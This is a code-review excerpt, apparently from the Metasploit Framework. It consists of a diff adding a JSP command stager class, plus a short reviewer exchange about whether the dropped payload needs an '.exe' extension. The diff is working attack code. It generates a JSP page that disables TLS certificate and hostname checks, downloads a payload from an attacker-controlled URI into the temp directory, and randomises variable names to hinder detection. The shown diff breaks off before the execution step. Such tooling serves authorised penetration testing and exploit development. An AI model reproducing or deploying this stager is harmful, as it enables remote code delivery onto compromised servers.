lib/rex/exploitation/cmdstager/jsp.rb

```diff
@@ -0,0 +1,110 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerJSP < Rex::Exploitation::CmdStagerBase
+  def http?
+    true
+  end
+
+  def user_agent
+    /^java/i
+  end
+
+  def generate(opts = {})
+    raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]" if opts[:payload_uri].nil?
+    @payload_name ||= Rex::Text.rand_text_alphanumeric(rand(3..8))
+
+    super
+  end
+
+  def generate_cmds_payload(opts)
+    identifier_generator = Rex::RandomIdentifier::Generator.new({ language: :jsp })
+
+    # replace the meaningful variable names with random ones
+    local_variables = %w[trustAllCerts ssl_ctx allHostsValid url_input file_output dataBuffer bytesRead
+                         x509cert1 authType1 x509cert2 authType2 hostname_str ssl_sess].map do |var|
+      [var, identifier_generator.generate]
+    end.to_h
+
+    # parts of the JSP payload, will be concatenated
+
+    elements = [
+      '<%@page import="java.io.*"%>',
+      '<%@page import="javax.net.ssl.*"%>',
+      %&
+<%
+  TrustManager[] trustAllCerts = new TrustManager[]{
+    new X509TrustManager() {
+        public java.security.cert.X509Certificate[] getAcceptedIssuers() {
+            return null;
+        }
+        public void checkClientTrusted(
+            java.security.cert.X509Certificate[] x509cert1, String authType1) {
+        }
+        public void checkServerTrusted(
+            java.security.cert.X509Certificate[] x509cert2, String authType2) {
+        }
+    }
+  };
+  try {
+    SSLContext ssl_ctx = SSLContext.getInstance("SSL");
+    ssl_ctx.init(null, trustAllCerts, new java.security.SecureRandom());
+    HttpsURLConnection.setDefaultSSLSocketFactory(ssl_ctx.getSocketFactory());
+    HostnameVerifier allHostsValid = new HostnameVerifier() {
+      public boolean verify(String hostname_str, SSLSession ssl_sess) {
+        return true;
+      }
+    };
+
+    HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
+  }
+  catch (Exception e)
+  {
+  }
+%>
+&,
+      %&
+<%
+  try{
+    BufferedInputStream url_input = new BufferedInputStream(new java.net.URL("#{opts[:payload_uri]}").openStream());
+    FileOutputStream file_output = new FileOutputStream(System.getProperty("java.io.tmpdir") + "#{@payload_name}.exe");
```

Comment:
Will this always need `.exe` at the end?

Reply:
No, I added a comment about this five days ago, it's only needed if the operating system runs files by extension (and even on Windows, I imagine the payload could be an MSI or Powershell file instead).

Not sure if it's possible to check which operating system we are dealing with, was thinking of `Platform`, but isn't it supposed to be `"java"` for the kind of modules making use of this CmdStager?